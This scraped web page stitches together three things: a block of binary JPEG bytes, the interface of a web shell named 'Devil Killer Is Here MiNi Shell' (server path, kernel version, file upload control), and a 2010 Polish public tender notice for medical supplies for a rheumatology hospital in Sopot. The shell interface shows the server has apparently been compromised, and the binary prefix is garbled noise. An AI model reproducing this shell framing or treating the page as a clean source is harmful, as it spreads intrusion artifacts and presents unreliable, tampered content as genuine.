JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100125/20686-N-2010.html

<p class="kh_header"><b>Sopot: Sukcesywne dostawy drobnego sprzętu medycznego do Wojewódzkiego Zespołu Reumatologicznego im. dr Jadwigi Titz-Kosko w Sopocie</b><br>
<b>Numer ogłoszenia: 20686 - 2010; data zamieszczenia: 25.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Zespół Reumatologiczny im. dr Jadwigi Titz-Kosko , ul. Grunwaldzka 1-3, 81-759 Sopot, woj. pomorskie, tel. 058 5557528.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wzr.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy drobnego sprzętu medycznego do Wojewódzkiego Zespołu Reumatologicznego im. dr Jadwigi Titz-Kosko w Sopocie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET 1- STRZYKAWKI CPV - 33141310-6
6 pozycji: łącznie 167 opak., 170 szt.
PAKIET 2 - IGŁY MEDYCZNE, KANIULE* CPV - 33141320-9, 33141220-8
13 pozycji: łącznie 337 opak., 750 szt., 
PAKIET 3- KANIULE CPV - 33141220-8
6 pozycji: łącznie 1 655 szt.
PAKIET 4 - URZĄDZENIA I PRZYRZĄDY DO TRANSFUZJI I INFUZJI* CPV 33194000-6
4 pozycje: łącznie 2 490 szt.
PAKIET 5 - PRODUKTY Z DREWNA CIĘTEGO CPV 03419100-1
1 pozycja: łącznie 6 000 szt.
PAKIET 6 - CEWNIKI CPV 33141200-2, WORKI DO CEWNIKÓW CPV 33141210-5
7 pozycji: łącznie 254 szt.
PAKIET 7 - PAPIER FOTOCZUŁY, TERMOCZUŁY LUB PAPIER TERMOGRAFICZNY I TEKTURA CPV 22993000-7, CZYNNIKI DIAGNOSTYCZNE CPV 33694000-1, 33751000-9 
8 pozycji: łącznie 825 rol., 424 opak.
PAKIET  8 - RĘKAWICE CHIRURGICZNE CPV 33141420-0
4 pozycje: łącznie 350 par, 630 opak.
PAKIET 9 - JEDNORAZOWE, NIECHEMICZNE ARTYKUŁY MEDYCZNE I HEMATOLOGICZNE CPV 33141000-0
2 pozycje: łącznie 2 opak.
PAKIET 10 - URZĄDZENIA MEDYCZNE CPV 33100000-1, SKALPELE I NOŻE CHIRURGICZNE CPV 33141411-4, PRODUKTY Z TWORZYW SZTUCZNYCH CPV 19520000-7, ZESTAWY DO PODAWANIA LEKÓW CPV 33141624-0
16 pozycji: łącznie 73 654 szt.
PAKIET 11 - WŁÓKNA POJEDYNCZE Z TWORZYW SZTUCZNYCH (RÓŻNE WYROBY WŁÓKIENNICZE Z TWORZYW SZTUCZNYCH), PODKŁADY MEDYCZNE I DOZOWNIK NA PODKŁADY MEDYCZNE CPV 39525000-8
7 pozycji: łącznie 17 622 szt.
PAKIET 12 - TERMOMETRY CPV 38412000-6, JEDNORAZOWE NIECHEMICZNE ARTYKUŁY MEDYCZNE I HEMATOLOGICZNE CPV 33141000-0, BATERIE CPV 31420000-6
4 pozycje: łącznie 110 szt., 50 opak.
PAKIET 13 - MASKI TLENOWE CPV 33157110-9
3 pozycje: łącznie 54 szt.
PAKIET 14 - WAGI ELEKTRONICZNE CPV 38311000-8
1 pozycja: łącznie 2 szt., 
PAKIET 15 - ELEKTRODY DO KARDIOMONITORA CPV 33123200-0
1 pozycja: łącznie 60 szt.
PAKIET 16 - ELEKTRODY i GŁOWICE CPV 33123200-0, CPV 33158200-4
3 pozycje: łącznie 45 opak., 1 szt.
PAKIET 17 - URZĄDZENIA DO TERAPII GAZOWEJ I ODDECHOWEJ CPV 33157000-51 
4 pozycje: łącznie 131 szt.
PAKIET 18 - JEDNORAZOWE ZESTAWY LARYNGOLOGICZNE CPV 33141620-2
2 pozycje: łącznie 610 szt.
PAKIET 19 - DRABINKI PRZYŁÓŻKOWE CPV 33100000-1
1 pozycja: łącznie 2 szt.
PAKIET 20 - SPIROMETR CPV 33100000-1
1 pozycja: łącznie 1 szt.
PAKIET 21 - FILTRY DO LAMPY SOLLUX CPV 33100000-1
2 pozycje: łącznie 12 szt.

* Zamawiający wymaga dostarczenia próbek.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6, 33.14.13.20-9, 33.14.12.20-8, 33.19.40.00-6, 03.41.91.00-1, 33.14.12.00-2, 33.14.12.10-5, 22.99.30.00-7, 33.14.14.20-0, 33.69.40.00-1, 33.14.10.00-0, 33.14.14.11-4, 39.52.50.00-8, 38.41.20.00-6, 31.42.00.00-6, 33.14.10.00-0, 19.52.00.00-7, 33.14.16.24-0, 33.15.71.10-9, 38.31.10.00-8, 33.12.32.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 21.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wniesienie wadium - nie jest wymagane.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I. O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający następujące warunki: 
a) posiadania wiedzy i doświadczenia w postaci należytego wykonania, a w przypadku świadczeń okresowych lub ciągłych również wykonywania, co najmniej jednej dostawy drobnego sprzętu medycznego w okresie ostatnich trzech lat przed upływem terminu składania ofert; 
b) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - zapewniających wykonanie zamówienia; 
c) posiadania sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 

II. Zamawiający ustala następujący sposób oceny warunków udziału w postępowaniu: 
2.1. a/ w zakresie warunku wskazanego w pkt.I lit.a) - ocena spełniania warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów wskazanych w pkt. 1 i 2 Informacji o oświadczeniach i dokumentach
W razie złożenia przez Wykonawcę oświadczenia o spełnianiu warunku wskazanego w pkt.I lit.a) oraz wykazu usług potwierdzającego należyte wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanie, co najmniej jednej dostawy drobnego sprzętu medycznego w okresie ostatnich trzech lat przed upływem terminu składania ofert; Zamawiający uzna warunek za spełniony.
Jeżeli Wykonawca nie dysponuje zasobami niezbędnymi do realizacji niniejszego zamówienia, ocena spełnienia warunku  nastąpi w oparciu o pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
b/ w zakresie warunku wskazanego w pkt.I lit.b) - ocena spełniania warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów wskazanych w pkt. 3 Informacji o oświadczeniach i dokumentach.
W razie złożenia przez Wykonawcę oświadczenia o spełnianiu warunku wskazanego w pkt.I lit.b), Zamawiający uzna warunek za spełniony.
Jeżeli Wykonawca nie dysponuje zasobami niezbędnymi do realizacji niniejszego zamówienia, ocena spełnienia warunku  nastąpi w oparciu o pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

c/ w zakresie warunku wskazanego w pkt.I lit.c) - ocena spełniania warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów wskazanych w pkt. 4 Informacji o oświadczeniach i dokumentach.
W razie złożenia przez Wykonawcę oświadczenia o spełnianiu warunku wskazanego w pkt.I lit.c), Zamawiający uzna warunek za spełniony.
Jeżeli Wykonawca nie dysponuje zasobami niezbędnymi do realizacji niniejszego zamówienia, ocena spełnienia warunku  nastąpi w oparciu o pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

2.2. Zamawiający oceni spełnianie w/w warunków wymaganych od Wykonawców określonych w Rozdziale IV SIWZ na zasadzie: spełnia/nie spełnia.
3. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. wypełnione Oświadczenie o spełnianiu tego warunku - stanowiące Załącznik nr 2 do SIWZ

W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia - każdy z Wykonawców jest zobowiązany złożyć ten dokument
Jeżeli Wykonawca nie dysponuje zasobami niezbędnymi do realizacji niniejszego zamówienia - pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
2. Oświadczenie - wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również  wykonywanych dostaw w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem do terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że dostawy lub usługi zostały wykonane lub są wykonywane należycie /np. referencje/ - stanowiące załącznik nr 4 do SIWZ. 
Jeżeli Wykonawca nie dysponuje zasobami niezbędnymi do realizacji niniejszego zamówienia - pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.  
3. wypełnione Oświadczenie o spełnianiu tego warunku - stanowiące załącznik nr 2 do SIWZ

W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia - każdy z Wykonawców jest zobowiązany złożyć ten dokument.
Jeżeli Wykonawca nie dysponuje zasobami niezbędnymi do realizacji niniejszego zamówienia - pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
4.  wypełnione Oświadczenie o spełnianiu tego warunku - stanowiące załącznik nr 2 do SIWZ

W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia - każdy z Wykonawców jest zobowiązany złożyć ten dokument
Jeżeli Wykonawca nie dysponuje zasobami niezbędnymi do realizacji niniejszego zamówienia - pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
5. aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy;

W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia - każdy z Wykonawców jest zobowiązany złożyć ten dokument.
6. wypełnione Oświadczenie o niepodleganiu wykluczeniu - stanowiące Załącznik nr 3 do SIWZ

W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia - każdy z Wykonawców jest zobowiązany złożyć ten dokument.
7. W przypadku gdy dany oferowany produkt jest wyrobem medycznym w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o wyrobach medycznych (Dz.U. z 2004r. Nr 93 poz. 896) - deklaracja producenta o spełnieniu wymagań zasadniczych dla wyrobów medycznych dla danego oferowanego produktu bądź dokument potwierdzający dokonanie zgłoszenia danego wyrobu do Rejestru wyrobów medycznych i podmiotów odpowiedzialnych za wprowadzenie do obrotu i używania. W wypadku, gdy dla danego podmiotu w stosunku do danego wyrobu dokonanie zgłoszenia jest obowiązkowe, prosimy o przedstawienie dokumentu potwierdzającego dokonanie zgłoszenia danego wyrobu do Rejestru wyrobów medycznych i podmiotów odpowiedzialnych za wprowadzenie do obrotu i używania.
8. wypełnionego FORMULARZA OFERTY - stanowiącego załącznik nr 1 do SIWZ. 
9.  wypełnionego FORMULARZA OFERTOWO - CENOWEGO - stanowiącego załącznik nr 6 do SIWZ
10. wykazu próbek złożonych wraz z ofertą - załącznik nr 5 (dot. PAKIETU nr 2 i PAKIETU nr 4).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wzr.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Zespół Reumatologiczny
im. Jadwigi Titz - Kosko
ul. Grunwaldzka 1/3
81-759 Sopot
Sekretariat, II piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2010 godzina 10:00, miejsce: Wojewódzki Zespół Reumatologiczny
im. Jadwigi Titz - Kosko
ul. Grunwaldzka 1/3
81-759 Sopot
Sekretariat, II piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> DODATKOWA INFORMACJA DLA WYKONAWCÓW:
- MAJĄCYCH SIEDZIBĘ LUB MIEJSCE ZAMIESZKANIA ZA GRANICĄ: 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
- zamiast dokumentów wskazanych w pkt. 1 ppkt.1 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert). 

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów wskazanych w pkt. 1 ppkt.1 - Wykonawca winien je zastąpić dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 

- WSPÓLNIE UBIEGAJĄCYCH SIĘ O UDZIELENIE ZAMÓWIENIA: 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - Wykonawcy są zobowiązani dołączyć dodatkowo dokument ustanawiający pełnomocnika do reprezentowania ich w niniejszym postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia.
    
Pełnomocnictwo musi być złożone w formie oryginału lub poświadczonej notarialnie lub przez Wykonawcę kopii, albo sporządzonego przez notariusza odpisu lub wyciągu z dokumentu. Treść pełnomocnictwa musi jednoznacznie określać czynności, do wykonywania których pełnomocnik jest upoważniony. 

Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania wynikającego ze złożonej oferty.

UWAGA: jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana - Zamawiający zażąda - przed podpisaniem umowy - umowy regulującej współpracę tych podmiotów. 
Każdy z Wykonawców jest zobowiązany złożyć dokumenty wymagane przez Zamawiającego
w jednej z następujących form:
- oryginały,
- kserokopie poświadczone za zgodność z oryginałem przez Wykonawcę.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - każdy z Wykonawców poświadcza także własne dokumenty .

1. Rodzaj procedury: otwarta
2. Kryteria udzielenie zamówienia : 
a)	Cena 100% - dla pakietów 1,3,5-21
b)	Cena 70%, jakość 30% - dla pakietów 2,4
3.	Nie będzie wykorzystana aukcja elektroniczna. 
4.	Dynamiczny system zakupu nie ma zastosowania.
5.	Umowa ramowa nie ma zastosowania.
6.	Formalności po wyborze oferty:
a.	Zamawiający po wyborze oferty zawiadomi pisemnie Wykonawcę, którego oferta zostanie wybrana o dacie i miejscu zawarcia Umowy.
b.	Umowa będzie podpisana przez Zamawiającego i wybranego Wykonawcę - nie wcześniej niż po upływie 7 dni po zawiadomieniu o wyborze Wykonawcy, z wyłączeniem sytuacji gdy zostanie wniesiony protest przez któregokolwiek z pozostałych uczestników postępowania, chyba że w postępowaniu o udzielenie zamówienia w danym pakiecie zostanie złożona tylko jedna oferta.
c.	Niedopuszczalne pod rygorem nieważności są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że nastąpią następujące warunki zmiany umowy:
- w trakcie trwania umowy ceny ulegną zmianie w przypadku zmian (także obniżka) stawek podatku VAT bezpośrednio związanych z przedmiotem zamówienia.
- wystąpią okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w związku z nimi wystąpi konieczność wprowadzenia zmian do umowy, a zmiany te są korzystne dla Zamawiającego i zostaną zaakceptowane przez Wykonawcę. 
Jest to zamówienie o charakterze powtarzającym się. 

Numer referencyjny nadany sprawie przez podmiot zamawiający : N/1/10
Brak poprzednich publikacji dotyczących tego samego ogłoszenia
Warunki uzyskania specyfikacji: do dnia 5 lutego 2010 roku, Formularz Specyfikacji  Istotnych Warunków Zamówienia dotyczącej niniejszego postępowania można odebrać osobiście, na stronie internetowej www.wzr.com.pl lub za zaliczeniem pocztowym w:
Wojewódzki Zespół Reumatologiczny
im. Jadwigi Titz - Kosko
ul. Grunwaldzka 1/3
81-759 Sopot
Sekretariat, II piętro 
cena formularza Specyfikacji Istotnych Warunków Zamówienia - 10 zł (+ VAT ) 
Termin realizacji zamówienia: 
sukcesywnie, 12 miesięcy od dnia podpisania umowy. WYKONAWCA jest zobowiązany dostarczyć przedmiot umowy objęty zamówieniem  w terminie do 7 (słownie: siedmiu) dni roboczych od daty zgłoszenia zapotrzebowania.
INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM:
1. Warunki dotyczące zamówienia - wymagane wadia i gwarancje : 
Wniesienie wadium - nie jest wymagane.
Zabezpieczenie należytego wykonania umowy - nie jest wymagane.
2. Główne warunki finansowania i płatności : 
Płatności z tytułu dostaw przedmiotu zamówienia zostanie dokonana w terminie do 30 dni od daty dostawy i otrzymania faktury.
3. Forma prawna, jaką musi przyjąć grupa wykonawców, której zostanie udzielone zamówienie : 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - Wykonawcy są zobowiązani dołączyć dodatkowo : 
- listę Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia oraz 
- dokument ustanawiający pełnomocnika do reprezentowania ich w niniejszym postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy  w sprawie zamówienia .    
Pełnomocnictwo musi być złożone w formie oryginału, poświadczonej notarialnie kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu. Treść pełnomocnictwa musi jednoznacznie określać czynności, do wykonywania których pełnomocnik jest upoważniony . 
Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana - Zamawiający zażąda -przed podpisaniem umowy - umowy regulującej współpracę tych podmiotów. Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność  za niewykonanie lub nienależyte wykonanie zobowiązania.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - każdy z Wykonawców poświadcza także własne dokumenty.

MIEJSCE I TERMIN SKŁADANIA OFERT.
Ofertę należy doręczyć do dnia : 8 lutego 2010 roku o godz. 10.00 do: 
Wojewódzki Zespół Reumatologiczny im. Jadwigi Titz - Kosko                                  
ul. Grunwaldzka 1/3
81-759 Sopot                                                                  
Sekretariat, II piętro
MIEJSCE I TERMIN OTWARCIA OFERT.
Komisyjne otwarcie ofert nastąpi w trakcie posiedzenia Komisji Przetargowej, które odbędzie się w  dniu: 
8 lutego 2010 roku o godz. 11.00 w:      
Wojewódzki Zespół Reumatologiczny im. Jadwigi Titz - Kosko                                  
ul. Grunwaldzka 1/3
81-759 Sopot                                                                      
Dział Zamówień Publicznych, II piętro, pok. nr 7B
Język, w którym można sporządzać oferty : PL.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> STRZYKAWKI
6 pozycji: łącznie 167 opak., 170 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> IGŁY MEDYCZNE, KANIULE*
13 pozycji: łącznie 337 opak., 750 szt., 
*ZAMAWIAJĄCY WYMAGA DOSTARCZENIA PRÓBEK.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9, 33.14.12.20-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KANIULE
6 pozycji: łącznie 1 655 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET 4.</p>
